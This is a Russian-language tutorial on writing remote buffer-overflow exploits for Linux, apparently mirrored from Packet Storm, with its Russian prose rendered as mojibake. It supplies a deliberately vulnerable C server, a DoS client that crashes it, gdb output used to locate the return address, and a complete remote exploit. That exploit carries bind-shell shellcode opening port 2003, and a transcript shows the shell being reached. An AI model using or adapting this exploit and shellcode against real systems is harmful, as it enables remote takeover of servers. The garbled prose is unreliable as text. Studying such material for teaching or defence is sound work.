Paper on remote exploits.
fa5b3b2dd317bf0d324f9dc5e4c8ef6f0afa4db0decc52199b61e207d1122348Óäàëåííîå ïåðåïîëíåíèå áóôåðà
( íàïèñàíèå remote exploits )
×èòàÿ ìíîæåñòâî äîêóìåíòàöèé ïî ïåðåïîëíåíèþ áóôåðà,
òåõíèêå ïåðåïîëíåíèÿ áóôåðà, ÿ çàìåòèë, ÷òî âî âñåõ
ìàíóàëàõ, îïèñûâàþòñÿ òîëüêî ëîêàëüíûå ïåðåïîëíåíèÿ,
à îá óäàëåííûõ íè ñëîâà… Â äàííîé ñòàòüå ÿ õîòåë áû
âîñïîëíèòü ýòîò ïðîáåë è îáúÿñíèòü âàì òåõíèêó óäàëåí
íîãî ïåðåïîëíåíèÿ áóôåðà. Ðå÷ü ó íàñ ïîéäåò î òîì,
êàê íàïèñàòü êëèåíòà äëÿ ïåðåïîëíåíèÿ óäàëåííîãî
ñåðâåðà... Â äàííîé ñòàòüå ìû íàïèøåì óÿçâèìûé ñåðâåð
è êëèåíòà, êîòîðûé áóäåò ïåðåïîëíÿòü áóôåð ó óäàëåí
íîãî ñåðâåðà ñ èñïîëíåíèåì øåëëêîäà...
Ñêàæó òî, ÷òî â äàííîé ñòàòüå ðå÷ü ïîéäåò î linux ñèñ
òåìàõ... Âñÿ äàííàÿ èíôîðìàöèÿ áóäåò èñïîëíÿòüñÿ íà
linux ìàøèíàõ, è íèêàê íå íà windows ñîâìåñòèìûõ ñèñ
òåìàõ.
Ñêàæó òî, ÷òî êëèåíò è ñåðâåð ÿ âçÿë ó àâòîðèòåòíîé
security-team - w00w00, â èõ àðõèâàõ w00giving â ðàç
äåëå LibExploit. ß åãî íåìíîãî ïîäêîððåêòèðîâàë (óáðà
ë áèáëèîòåêó LibExploit), ÷òîáû êëèåíò ìîã èñïîëíÿòü
ñÿ íà âàøåé ñèñòåìå áåç âñÿêèõ ïðîáëåì...
Èòàê, âîò ñåðâåðíàÿ ÷àñòü:
[====================== Server =====================]
/*
* our buggy server
*/
#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#define BUFFER_SIZE 1024
#define NAME_SIZE 2048
#define NO -1
int handling_client(int c) {
char buffer[BUFFER_SIZE], name[NAME_SIZE];
int bytes;
strcpy(buffer, "Login : ");
bytes = send(c, buffer, strlen(buffer), 0);
if (bytes == NO)
return NO;
bytes = recv(c, name, sizeof(name), 0);
if (bytes == NO)
return NO;
name[bytes - 1] = '\0';
sprintf(buffer, "Hello %s!\r\n", name);
bytes = send(c, buffer, strlen(buffer), 0);
if (bytes == NO)
return NO;
return 0;
}
int main(int argc, char *argv[]) {
int Sock, con, client_size;
struct sockaddr_in srv, cli;
if (argc != 2) {
fprintf(stderr, "usage: %s port\n", argv[0]);
return 1;
}
Sock = socket(AF_INET, SOCK_STREAM, 0);
if (Sock == NO) {
perror("socket() failed");
return 2;
}
srv.sin_addr.s_addr = INADDR_ANY;
srv.sin_port = htons( (unsigned short int) atol(argv[1]));
srv.sin_family = AF_INET;
if (bind(Sock, &srv, sizeof(srv)) == NO) {
perror("bind() failed");
return 3;
}
if (listen(Sock, 3) == NO) {
perror("listen() failed");
return 4;
}
for(;;) {
con = accept(Sock, &cli, &client_size);
if (con == NO) {
perror("accept() failed");
return 5;
}
if (handling_client(con) == NO)
fprintf(stderr, "%s: handling() failed", argv[0]);
close(con);
}
return 0;
}
/* E0F */
[====================== Server =====================]
Õî÷ó ïîÿñíèòü ïðèíöèï äåéñòâèÿ ñåðâåðíîé ÷àñòè:
Ñåðâåð çàïóñêàåòñÿ íà îïðåäåëåííîì ïîðòó è âûâîäèò
ïðèãëàøåíèå "Login" ïðè ïîäêëþ÷åíèè ê íåìó êëèåíòñ
êîé ÷àñòè. Íåòðóäíî äîãàäàòüñÿ, ÷òî ðàçìåð Login
(buf) îãðàíè÷åí - 1024 áàéò, à ðàçìåð ïåðåìåííîé
name - 2048. Ñêàæó, ÷òî â ïåðåìåííóþ name çàíîñèòñÿ
çíà÷åíèå Login. Äàëåå ïîëó÷åííàÿ ñòðîêà êîïèðóåòñÿ
â buf, è âûâîäèòñÿ ñîîáùåíèå âèäà : "Hello %s", ãäå
%s âåäåííîå çíà÷åíèå â ïîëå Login (ò.å. name). Îøèá
êà çàêëþ÷àåòñÿ â òîì, ÷òî ïðè ââîäå â ïîëå Login ñëè
øêîì áîëüøåå êîë-âî ñèìâîëîâ (áîëåå 1064), ïðèâîäèò
ê òîìó, ÷òî ñåðâåð âûëåòèò... Íàïîìíþ, ïî÷åìó èìåííî
1064, à íå 1024, òàê ýòî ïîòîìó, ÷òî 1024 - ñàìà ñòðî
êà, ïðè ââîäå áàéò ðàâíûõ 1024 ñåðâåð íå óïàäåò, ò.ê.
çíà÷åíèå ðåãèñòðîâ íå ïîìåíÿþòñÿ, 1064 áàéò, ýòî çíà
÷åíèå ïðè êîòîðîì çíà÷åíèå íåêîòîðûõ ðåãèñòðîâ çàòðóò
ñÿ è äàííûå ïåðåïîëíÿò ñòåê.
Èäåì äàëåå...
ß ïðåäëàãàþ íàïèñàòü ïðîãðàììó, êîòîðàÿ áóäåò óêëàäûâà
òü ñåðâåð â äàóí. Ò.å. ïðîãðàììó - DoS.
[====================== DoS client ===================]
#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
int main(int argc, char *argv[])
{
int i, sock;
char buf[1064];
struct sockaddr_in tgt;
if (argc < 2) { printf("usage : dos <ip> <port>\n\n");
return 0;
}
tgt.sin_family = AF_INET;
tgt.sin_port = htons(atoi(argv[2]));
tgt.sin_addr.s_addr = inet_addr(argv[1]);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
for (i = 0; i < 1064; i++) buf[i] = 'A';
connect(sock, (struct sockaddr *)&tgt, sizeof(tgt));
send(sock, buf, sizeof(buf), 0);
close(sock);
}
[====================== DoS client ===================]
Äóìàþ ðàçîáðàòüñÿ â ýòîé ïðîãðàììå î÷åíü ëåãêî. Ò.ê. â
íåé îñîáî òî ñëîæíîãî è íåò. Ïðîãðàììà ïðîñòî ñîåäèíÿò
ñÿ ñ ñåðâåðíîé ÷àñòüþ è ïîñûëàåò åé äàííûå - 1064 áàéò.
Ïðåäëàãàþ îòêîìïèëèðîâàòü íàø ñåðâåð è çàïóñòèòü.
[=====================================================]
[root@localhost home]# gcc server.c -o server
[root@localhost home]# ./server 12345
[=====================================================]
Èòàê ìû çàïóñòèëè íàø ñåðâåð íà 12345-îì ïîðòó.
Äàâàéòå ïðîñòî ñîåäèíèìñÿ ñ íèì ïðè ïîìîùè ñòàíäàðòíî
ãî telnet-êëèåíòà.
[=====================================================]
[root@localhost home]# telnet 127.0.0.1 12345
Trying 127.0.0.1...
Connected to localhost (127.0.0.1).
Escape character is '^]'.
Login : root
Hello root!
Connection closed by foreign host.
[root@localhost home]#
[=====================================================]
Êàê âèäíî ñåðâåð ïðîñòî êîïèðóåò ââåäåííîå çíà÷åíèå è
âûâîäèò ñîîáùåíèå íà ýêðàí.
Òåïåðü äàâàéòå çàïóñòèì íàø ñåðâåð â gdb è îòêîìïèëèðó
åì íàø DoS êëèåíò, è ïîïûòàåìñÿ çàïóñòèòü åãî íà íàø ñåð
âåð.
[=====================================================]
[root@localhost home]# gdb server
GNU gdb 6.0-2mdk (Mandrake Linux)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux-gnu"...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) r 12345
Starting program: /home/server 12345
[=====================================================]
Ïðîãðàììà ñòàðòîâàëà â gdb, òåïåðü îòêîìïèëèðóéòå dos
êëèåíò è çàïóñòèòå åãî...
[=====================================================]
[root@localhost home]# gcc dos.c -o dos
[root@localhost home]# ./dos 127.0.0.1 12345
[root@localhost home]#
[=====================================================]
Âçãëÿíåì íà îêíî, ãäå çàïóùåí ñåðâåð â gdb...
[=====================================================]
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)
[=====================================================]
Îïà... Ñåðâåð çàâåðøèëñÿ ñ îøèáêîé "Segmentation fault"
Ýòî ãîâîðèò î òîì, ÷òî ìû çàòåðëè çíà÷åíèå ðåãèñòðîâ...
0x41414141 in ?? () ýòà ñòðîêà ãîâîðèò î òîì, ÷òî íàøà
ïðîãðàììà îáðàòèëàñü ïî àäðåñó 0x41414141 è â èòîãå çà
âåðøèëàñü...
Äàâàéòå âçãëÿíåì íà çíà÷åíèÿ ðåãèñòðîâ...
[=====================================================]
(gdb) x/x $esp
0xbffff750: 0x41414141
(gdb)
[=====================================================]
Åñëè âû çíàêîìû ñ òåõíèêîé ïåðåïîëíåíèÿ, òî âàì ñêîðåå
óæå âñå ïîíÿòíî... Ñêàæó ÷òî ðåãèñòð $esp óêàçûâàåò íà
çíà÷åíèå 0x41414141.
Âçãëÿíåì íà äðóãèå âàæíûå ðåãèñòðû ñòåêà...
[=====================================================]
(gdb) i reg ebp eip
ebp 0x41414141 0x41414141
eip 0x41414141 0x41414141
(gdb)
[=====================================================]
Ýòè ðåãèñòðû çàòåðëèñü çíà÷åíèå "A" â hex ôîðìàòå...
Òàêñ... Ìû ìîæåì âçÿòü çíà÷åíèå $esp çà retaddr... Íî
äëÿ áîëüøåé óâåðåííîñòè äàâàéòå âçãëÿíåì íà ñòåê èçíóò
ðè...
[=====================================================]
(gdb) x/500bx $esp-500
0xbffff55c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff564: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff56c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff574: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff57c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff584: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff58c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff594: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff59c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5a4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5ac: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5b4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5bc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5c4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5cc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5d4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5dc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5e4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5ec: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5f4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5fc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff604: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff60c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff614: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff61c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff624: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff62c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff634: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff63c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff644: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff64c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff654: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff65c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff664: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff66c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff674: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff67c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff684: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff68c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff694: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff69c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6a4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
---Type <return> to continue, or q <return> to quit---
0xbffff6ac: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6b4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6bc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6c4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6cc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6d4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6dc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6e4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6ec: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6f4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6fc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff704: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff70c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff714: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff71c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff724: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff72c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff734: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff73c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff744: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff74c: 0x41 0x41 0x41 0x41
[=====================================================]
Âîò ýòî äà... Ñêàæó òî, ÷òî ìû ìîæåì ñî 100% óâåðåííîñòüþ
ìîæåì âçÿòü çà çíà÷åíèå retaddr ÷òî-òî èç ýòîãî :
...
0xbffff64c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff654: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff65c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff664: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff66c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff674: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
...
ò.ê. îíè óêàçûâàþò íà íàø àäðåñ (0x41414141) ò.å. "A" (hex),
ñëåäîâàòåëüíî ïðè ïðàâèëüíîì ôîðìèðîâàíèè âûïîëíÿò íàø çàâåò
íûé øåëëêîä.
Èòàê õâàòèò òåîðèè ïåðåéäåì ê ïðàêòèêå...
Òåïåðü ÿ ïðåäëàãàþ íàïèñàòü êëèåíòà, êîòîðûé áóäåò ñîåäè
íÿòüñÿ ñ ñåðâåðîì è ïåðåäîâàòü åé NOP+SHELLCODE+RET...
Äàëåå øåëëêîä áóäåò èñïîëíÿòüñÿ íà óäàëåííîé ìàøèòå...
[================= Remote Exloit ====================]
/*
* Exploit to overflow server program.
* Third example without using LibExploit :)
*
* Remote buffer overflow exploit.
*
*/
#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
static char shellcode[]= // Bind 2003 PORT
"\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
"\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
"\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
"\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
"\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
#define RET 0xbffff688
int main(int argc, char *argv[])
{
char buffer[1064];
int s, i, size;
struct sockaddr_in remote;
printf("using : 0x%x\n",RET);
if (argc != 3)
{
printf("usage : exploit ip port!\n");
return 0;
}
memset(buffer, 0x90, 1064);
memcpy(buffer+1001-sizeof(shellcode), shellcode, sizeof(shellcode));
buffer[1000] = 0x90;
for (i = 1022; i < 1062; i+=4)
{
*((int *)&buffer[i]) = RET;
}
buffer[1063] = 0x0;
s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
remote.sin_family = AF_INET;
remote.sin_port = htons(atoi(argv[2]));
remote.sin_addr.s_addr = inet_addr(argv[1]);
connect(s, (struct sockaddr *)&remote, sizeof(remote));
send(s, buffer, sizeof(buffer),0);
close(s);
}
[================= Remote Exloit ====================]
Äóìàþ, òå êòî ïîíèìàåò â òåõíèêå ïåðåïîëíåíèÿ óæå
ðàçîáðàëèñü ñ ýòîé ïðîãðàììîé. ß ëèøü ñêàæó, ÷òî
ñíà÷àëà ìû ïîäãîòàâëèâàåì áóôåð, çàïîëíÿåì åãî NOP'àìè
â ðàçìåðå 1064 áàéò. Äàëåå â áóôåð êîïèðóåòñÿ øåëëêîä.
Ïåðåâîäèì 1000 áàéò â NOP.
Ïîòîì ìû çàñîâûâàåì óêàçàòåëü íà íàø çàâåòíûé øåëëêîä â
ïðîìåæóòêå 1022 äî 1059, ýòî íà ïîäñòðàõîâêó. Ò.ê. åñëè
ìû çàñóíåì óêàçàòåëü â êîíåö áóôåðà, òî âðÿä ëè øåëëêîä
ñìîæåò âûïîëíèòüñÿ. Äàëåå null'èì 1063 áàéò. Ò.å. êîíåö
áóôåðà... Ïîòîì ñîåäèíÿåìñÿ ñ ñåðâåðîì è îòïðàâëÿåì íàø
ñôîðìèðîâàííûé êîä.
Îñòàëîñü ïðîâåðèòü åãî :
[====================================================]
[root@localhost home]# gcc exploit.c -o exploit
[root@localhost home]# ./exploit 127.0.0.1 12345
using : 0xbffff688
[root@localhost home]# telnet 127.0.0.1 2003
Trying 127.0.0.1...
Connected to localhost (127.0.0.1).
Escape character is '^]'.
[====================================================]
Íà ïîñëåäîê ìîæåòå âçãëÿíóòü íà îêíî ñåðâåðà. Ñåðâåð
íå óïàë. Îí ïðîäîëæàåò òàê æå óñåðäíî ðàáîòàòü. Ò.å.
íàøà çàäà÷à âûïîëíåíà. Ñìåþ íà ýòîì îòêëîíèòüñÿ...
Æåëàþ âñÿ÷åñêèõ óäà÷ â ïîçíàâàíèè îñíîâ ýêñïëîèòèíãà.
P.S. stan [unl0ck team]
Áëàãîäàðþ âñåõ ÷ëåíîâ êîìàíäû unl0ck.
Òàê æå ñïàñèáî xCrZx, ò.ê. øåëëêîä áûë
âçÿò èç åãî ýêñïëîèòà ê mod_gzip.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed